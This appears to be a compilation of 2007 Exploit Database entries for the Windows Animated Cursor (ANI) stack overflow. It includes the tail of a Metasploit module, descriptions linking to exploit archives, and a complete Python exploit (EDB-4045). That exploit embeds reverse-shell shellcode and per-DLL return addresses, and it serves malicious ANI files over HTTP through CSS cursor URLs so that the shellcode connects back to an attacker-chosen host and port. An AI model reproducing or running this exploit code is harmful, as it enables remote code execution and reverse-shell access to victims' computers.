Generates a riff chunk with the first bytes of the data being a relative # jump. This is used to bounce to the actual payload def generate_trampoline_riff_chunk tag = Rex::Text.to_rand_case(rand_text_alpha(4)) dat = "\xe9\xff\xff\xff\xff" + rand_text(1) + (rand_text(rand(256)+1) * 2) tag + [dat.length].pack('V') + dat end def generate_riff_chunk(len = (rand(256)+1) * 2) tag = Rex::Text.to_rand_case(rand_text_alpha(4)) dat = rand_text(len) tag + [dat.length].pack('V') + dat end def generate_css_padding buf = generate_whitespace() + "/*" + generate_whitespace() + generate_padding() + generate_whitespace() + "*/" + generate_whitespace() end def generate_whitespace len = rand(100)+2 set = "\x09\x20\x0d\x0a" buf = '' while (buf.length < len) buf << set[rand(set.length)].chr end buf end def generate_padding rand_text_alphanumeric(rand(128)+4) end end

Exploit Database EDB-ID : 3636

Publication date : 2007-03-31 22h00 +00:00
Author : jamikazu
EDB Verified : Yes

..::[ jamikazu presents ]::.. Windows Animated Cursor Handling Exploit (0day) (Version3) Works on fully patched Windows Vista I think it is first real remote code execution exploit on vista =) Tested on: Windows Vista Enterprise Version 6.0 (Build 6000) (default installation and UAC enabled) Windows Vista Ultimate Version 6.0 (Build 6000) (default installation and UAC enabled) Windows XP SP2 (It also must to work on all nt based windows but not tested) Update: It also bypass eeye security ani patch! Author: jamikazu Mail: jamikazu@gmail.com Bug discovered by determina (http://www.determina.com) Credit: milw0rm,metasploit, SkyLined, http://doctus.net/ invokes calc.exe if successful https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3636.zip (04012007-exp.zip) # milw0rm.com [2007-04-01]

Exploit Database EDB-ID : 3651

Publication date : 2007-04-02 22h00 +00:00
Author : YAG KOHHA
EDB Verified : Yes

#-------------------------------------------------------------------------------- # Info: .ANI (RIFF Cursors) 2007 universal exploit generator # Tested on MS Internet Explorer 6.x-7.x, Windows XP SP2, Windows Vista # Author: Yag Kohha <skyhole [at] gmail.com> # 10x`n`Gr33tz 2: # Jamikazu, Skylined (pretty good t-short on BH07 Europe - L00k like skylined, skylined, skylined) # H.D. Moor and metasploit project # Kumar Brothers (tnx for Vista patch live show at BH07 Europe), # Alexander Sotirov (tnx for "Heap Feng Shui" live show at BH07 Europe), str0ke # Microsoft for great coding and Amsterdam (BH07 Europe) party #-------------------------------------------------------------------------------- https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3651.tar.gz (04032007-ie_ani.tar.gz) # milw0rm.com [2007-04-03]

Exploit Database EDB-ID : 4045

Publication date : 2007-06-06 22h00 +00:00
Author : RISE Security
EDB Verified : Yes

#!/usr/bin/env python # # $Id: win32-loadaniicon.py 4 2007-06-02 00:47:59Z ramon $ # # Windows Animated Cursor Stack Overflow Exploit # Copyright 2007 Ramon de Carvalho Valle <ramon@risesecurity.org>, # RISE Security <contact@risesecurity.org> # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA # # # Windows Animated Cursor Stack Overflow Vulnerability # http://www.determina.com/security.research/vulnerabilities/ani-header.html # from BaseHTTPServer import * from os.path import * from random import * from socket import * from string import * from struct import * from sys import * # # windows/shell_reverse_tcp - 287 bytes # http://www.metasploit.com # EXITFUNC=seh, LPORT=1234, LHOST=127.0.0.1 # buf = \ '\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b' + \ '\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01' + \ '\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07' + \ '\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f' + \ '\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b' + \ '\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c' + \ '\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff' + \ '\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0' + \ '\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08' + \ '\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53' + \ '\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x68\x7f\x00\x00\x01\x66' + \ '\x68\x04\xd2\x66\x53\x89\xe1\x95\x68\xec\xf9\xaa\x60\x57\xff' + \ '\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d\x6a' + \ '\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\x95' + \ '\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab\x68' + \ '\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51' + \ '\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53\xff' + \ '\xd6\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6\x79\xff\x75\x04' + \ '\xff\xd6\xff\x77\xfc\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6' + \ '\xff\xd0' # Target list target = [ \ # call [ebx+4] # Microsoft Windows XP SP2 user32.dll (5.1.2600.2622) Multi Language {'addr': 0x25ba, 'len': 2, 'offset': 80}, # Microsoft Windows XP SP2 user32.dll (5.1.2600.2180) Multi Language {'addr': 0x25d0, 'len': 2, 'offset': 80}, # Microsoft Windows XP SP2 userenv.dll (5.1.2600.2180) English {'addr': 0x769fc81a, 'len': 4, 'offset': 80}, # Microsoft Windows XP SP2 user32.dll (5.1.2600.2180) English # {'addr': 0x77d825d0, 'len': 4, 'offset': 80}, # Microsoft Windows XP SP2 userenv.dll (5.1.2600.2180) Portuguese (Brazil) {'addr': 0x769dc81a, 'len': 4, 'offset': 80}, # Microsoft Windows XP SP2 user32.dll (5.1.2600.2180) Portuguese (Brazil) # {'addr': 0x77d625d0, 'len': 4, 'offset': 80}, # call [esi+4] # Microsoft Windows XP SP1a userenv.dll English {'addr': 0x75a758b1, 'len': 4, 'offset': 80}, # Microsoft Windows XP SP1a shell32.dll English # {'addr': 0x77441a66, 'len': 4, 'offset': 80}, # Microsoft Windows XP userenv.dll (5.1.2600.0) Portuguese (Brazil) {'addr': 0x75a4579b, 'len': 4, 'offset': 80}, # Microsoft Windows XP shell32.dll (6.0.2600.0) Portuguese (Brazil) # {'addr': 0x77427214, 'len': 4, 'offset': 80}, ] # Target list index tidx = 0 def randstr(count = 1, charset = 'ascii_alpha'): # Set the charset if charset == 'ascii_alpha': charset = digits + ascii_uppercase + ascii_lowercase elif charset == 'ascii_letters': charset = ascii_letters elif charset == 'ascii_lowercase': charset = ascii_lowercase elif charset == 'ascii_uppercase': charset = ascii_uppercase elif charset == 'digits': charset = digits elif charset == 'hexdigits': charset = hexdigits elif charset == 'octdigits': charset = octdigits # Create the string i = 0 str = '' while i < count: str = str + charset[randint(0, len(charset)-1)] i = i + 1 return str def riff_chunk(): chunk_id = randstr(4) chunk_data = randstr(randint(1, 256)*2) chunk_size = pack('<L', len(chunk_data)) return chunk_id + chunk_size + chunk_data def riff_ani_file(): global buf, target, tidx # Create the first header subchunk anih_a = [36, randint(1, 65535), randint(1, 65535), 0, 0, 0, 0, 0, 1] anih_a = pack('<%dL' % len(anih_a), *[i for i in anih_a]) anih_a = 'anih' + pack('<L', len(anih_a)) + anih_a # Create the second header subchunk anih_b = randstr(target[tidx]['offset']) # Set the current indexed target if target[tidx]['len'] == 1: anih_b = anih_b + pack('<B', target[tidx]['addr']) elif target[tidx]['len'] == 2: anih_b = anih_b + pack('<H', target[tidx]['addr']) else: anih_b = anih_b + pack('<L', target[tidx]['addr']) anih_b = 'anih' + pack('<L', len(anih_b)) + anih_b # Format ID riff = 'ACON' # Random subchunks for i in range(randint(1, 256)): riff = riff + riff_chunk() # First header subchunk riff = riff + anih_a # Random subchunks for i in range(randint(1, 256)): riff = riff + riff_chunk() # Second header subchunk riff = riff + anih_b # Shellcode riff = riff + buf # File ID and length of file riff = 'RIFF' + pack('<L', len(riff)) + riff # Update the target list index if tidx < len(target)-1: tidx = tidx + 1 else: tidx = 0 return riff def randhtml(): global buf, target, tidx # Random RIFF file extensions extension = ['ani', 'avi', 'cdr', 'rmi', 'wav'] # Random html document html = \ '<html>\n<head>\n<title>' + \ randstr(randint(1, 256)) + \ '</title>\n</head>\n<body>\n' for i in range(randint(0, 4)): html = html + randstr(randint(1, 256)) + '\n' for i in range(len(target)): html = html + \ '<div id="' + randstr(randint(4, 16)) + '" ' \ 'style="cursor: url(/' + randstr(randint(4, 16)) + '.' + \ extension[randint(0, len(extension)-1)] + ')">\n' for i in range(randint(0, 4)): html = html + randstr(randint(1, 256)) + '\n' html = html + '</div>\n' for i in range(randint(0, 4)): html = html + randstr(randint(1, 256)) + '\n' html = html + '</body>\n</html>\n' return html class RequestHandler(BaseHTTPRequestHandler): def do_GET(self): self.send_response(200) if self.path == '/': # Send the html document html = randhtml() self.send_header('Content-Type', 'text/html; charset=UTF-8') self.send_header('Content-Length', str(len(html))) self.end_headers() self.wfile.write(html) return # Generate and send the RIFF file riff = riff_ani_file() self.send_header('Content-Type', 'application/octetstream') self.send_header('Content-Length', str(len(riff))) self.end_headers() self.wfile.write(riff) def usage(): print 'Usage: ./%s <http_host> <http_port> <host> <port>' \ % basename(argv[0]) if __name__ == '__main__': print 'Windows Animated Cursor Stack Overflow Exploit' print 'Copyright 2007 RISE Security <contact@risesecurity.org>\n' args = argv[1:] if '-h' in args or '--help' in args: usage() exit() http_host = '0.0.0.0' http_port = 8080 host = '127.0.0.1' port = 1234 try: http_host = argv[1] http_port = atoi(argv[2]) host = argv[3] port = atoi(argv[4]) except: pass # Set shellcode host and port to connect to buf = buf[:160] + inet_aton(gethostbyname(host)) + buf[164:] buf = buf[:166] + pack('<H', port) + buf[168:] # Start the HTTP server server_class = HTTPServer httpd = server_class((http_host, http_port), RequestHandler) print 'Listening on %s:%s' % (http_host, http_port) try: httpd.serve_forever() except: pass # milw0rm.com [2007-06-07]

Exploit Database EDB-ID : 3635

Publication date : 2007-03-31 22h00 +00:00
Author : Trirat Puttaraksa
EDB Verified : Yes

Microsoft ANI Buffer Overflow Exploit Author: Trirat Puttaraksa http://sf-freedom.blogspot.com Tested on: Windows XP SP2 fully patched + IE 6 SP2 For educational purpose only There are many confuses about this vulnerability. Someone said that this could not be exploited in XP SP2 - that's wrong. I provide this exploit because I wanna to tell these people that they are in danger. This exploit will call calc.exe (shellcode fome metasploit win32_exec CMD=calc.exe EXITFUNC=process). P.S. I do not include the source code for generate the .ani file because of its damage. However, if you reverse engineer .ani file, you will know how could I produce this exploit in 10 minutes. I will describe this vulnerability and how to exploit it in my blog after M$ released patch. greets: used SkyLined's idea of exploitation. tnx to him. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3635.zip (04012007-ani.zip) # milw0rm.com [2007-04-01]

Exploit Database EDB-ID : 3634

Publication date : 2007-03-31 22h00 +00:00
Author : jamikazu
EDB Verified : Yes

..::[ jamikazu presents ]::.. Windows Animated Cursor Handling Exploit (0day) Works on fully patched Windows Vista I think it is first real remote code execution exploit on vista =) Tested on: Windows Vista Enterprise Version 6.0 (Build 6000) (default installation and UAC enabled) Windows Vista Ultimate Version 6.0 (Build 6000) (default installation and UAC enabled) Windows XP SP2 (It also must to work on all nt based windows but not tested) Author: jamikazu Mail: jamikazu@gmail.com Bug discovered by determina (http://www.determina.com) Credit: milw0rm,metasploit, SkyLined, http://doctus.net/ invokes calc.exe if successful https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3634.zip (04012007-Animated_Cursor_Exploit.zip) # milw0rm.com [2007-04-01]